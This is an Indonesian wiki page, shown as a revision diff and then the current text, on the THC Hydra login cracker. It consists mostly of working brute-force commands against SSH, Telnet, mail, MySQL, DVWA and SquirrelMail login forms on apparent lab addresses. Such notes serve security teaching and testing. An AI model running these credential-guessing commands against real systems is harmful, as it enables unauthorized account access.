Difference between revisions of "Hydra"

From OnnoWiki
Jump to navigation Jump to search
(New page: System yang di serang Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM...)
 
 
(32 intermediate revisions by the same user not shown)
Line 1: Line 1:
 +
Hydra adalah login cracker (menjebol username & password) yang sangat terkenal dan dihormati oleh cracker yang dapat mendukung layanan yang berbeda.
 +
 +
 
System yang di serang
 
System yang di serang
  
Line 10: Line 13:
 
  Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
 
  Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
  
Contoh cara menggunakan
+
==Contoh==
  
 
  hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban
 
  hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban
 +
hydra -L userlist.txt -P passwordlist.txt ssh://192.168.0.80
 +
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f ssh://192.168.0.80
 +
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f telnet://192.168.0.80
 +
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f pop3://192.168.0.80
 +
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f imap://192.168.0.80
 +
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f 192.168.0.80 mysql
 +
 +
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 mysql
 +
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 telnet
 +
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 ssh
 +
 +
==Untuk DVWA (HTTP)==
 +
 +
hydra -L <USER> -P <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”
 +
 +
hydra -L <USER> -P <Password> <IP Address> http-get-form “<Login Page>:<Request Body>:<Error Message>”
 +
 +
'''OK'''
 +
 +
hydra -V -l admin -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
 +
 +
hydra -L userdvwa.txt -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
 +
 +
hydra -V -l admin -p password "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
 +
 +
hydra -l onno -p 123456 "http-post-form://192.168.0.102/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect.:H=Cookie: squirrelmail_language=en_US; SQMSESSID=64rlshafc6564a7nkmilibhos2; PHPSESSID=skmk06cabbg4dqnpin19oanph6"
 +
 +
hydra -L dvwauser.txt -P /usr/share/set/src/fasttrack/wordlist.txt "http-post-form://192.168.0.102/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect.:H=Cookie: squirrelmail_language=en_US; SQMSESSID=64rlshafc6564a7nkmilibhos2; PHPSESSID=skmk06cabbg4dqnpin19oanph6"
 +
 +
 +
'''BISA di COBA, bisa ERROR'''
 +
 +
hydra 192.168.0.102 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-get-form "DVWA-1.9/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=Low;PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63"
 +
 +
hydra 192.168.0.102 -l admin -P testpassword http-get-form "/DVWA-1.9/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63"
 +
 +
hydra -V -l smithy -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
 +
 +
 +
===Proxy===
 +
 +
Pakai environment variable
 +
 +
HYDRA_PROXY="127.0.0.1:8080"
  
 
==Referensi==
 
==Referensi==
  
 
* https://www.thc.org/thc-hydra/
 
* https://www.thc.org/thc-hydra/
 +
* http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-online-web-form-passwords-with-thc-hydra-burp-suite-0160643/
 +
 +
===General usage and options===
 +
* http://www.aldeid.com/wiki/Thc-hydra
 +
* http://resources.infosecinstitute.com/online-dictionary-attack-with-hydra/
 +
 +
===HTTP basic auth===
 +
* https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29
 +
* http://www.sillychicken.co.nz/Security/how-to-brute-force-your-router-in-windows.html
 +
 +
===HTTP form based auth===
 +
* http://www.art0.org/security/performing-a-dictionary-attack-on-an-http-login-form-using-hydra
 +
* http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html
 +
* http://www.sillychicken.co.nz/Security/how-to-brute-force-http-forms-in-windows.html
 +
* https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29
 +
 +
===Multiple protocols===
 +
* http://wiki.bywire.org/Hydra
 +
* http://www.attackvector.org/brute-force-with-thc-hydra/
 +
* http://www.madirish.net/content/hydra-brute-force-utility
 +
         
 +
===Telnet===
 +
* http://www.theprohack.com/2009/04/basics-of-cracking-ftp-and-telnet.html
 +
* http://www.adeptus-mechanicus.com/codex/bflog/bflog.html

Latest revision as of 09:35, 19 February 2020

Hydra adalah login cracker (menjebol username & password) yang sangat terkenal dan dihormati oleh cracker yang dapat mendukung layanan yang berbeda.


System yang di serang

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird,
FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD,
HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP,
Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3,
POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion,
Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Contoh

hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban
hydra -L userlist.txt -P passwordlist.txt ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f telnet://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f pop3://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f imap://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f 192.168.0.80 mysql
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 mysql
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 telnet
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 ssh

Untuk DVWA (HTTP)

hydra -L <USER> -P <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”
hydra -L <USER> -P <Password> <IP Address> http-get-form “<Login Page>:<Request Body>:<Error Message>”

OK

hydra -V -l admin -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
hydra -L userdvwa.txt -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
hydra -V -l admin -p password "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
hydra -l onno -p 123456 "http-post-form://192.168.0.102/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect.:H=Cookie: squirrelmail_language=en_US; SQMSESSID=64rlshafc6564a7nkmilibhos2; PHPSESSID=skmk06cabbg4dqnpin19oanph6"
hydra -L dvwauser.txt -P /usr/share/set/src/fasttrack/wordlist.txt "http-post-form://192.168.0.102/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect.:H=Cookie: squirrelmail_language=en_US; SQMSESSID=64rlshafc6564a7nkmilibhos2; PHPSESSID=skmk06cabbg4dqnpin19oanph6"


BISA di COBA, bisa ERROR

hydra 192.168.0.102 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-get-form "DVWA-1.9/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=Low;PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63"
hydra 192.168.0.102 -l admin -P testpassword http-get-form "/DVWA-1.9/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63"
hydra -V -l smithy -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"


Proxy

Pakai environment variable

HYDRA_PROXY="127.0.0.1:8080"

Referensi

General usage and options

HTTP basic auth

HTTP form based auth

Multiple protocols

Telnet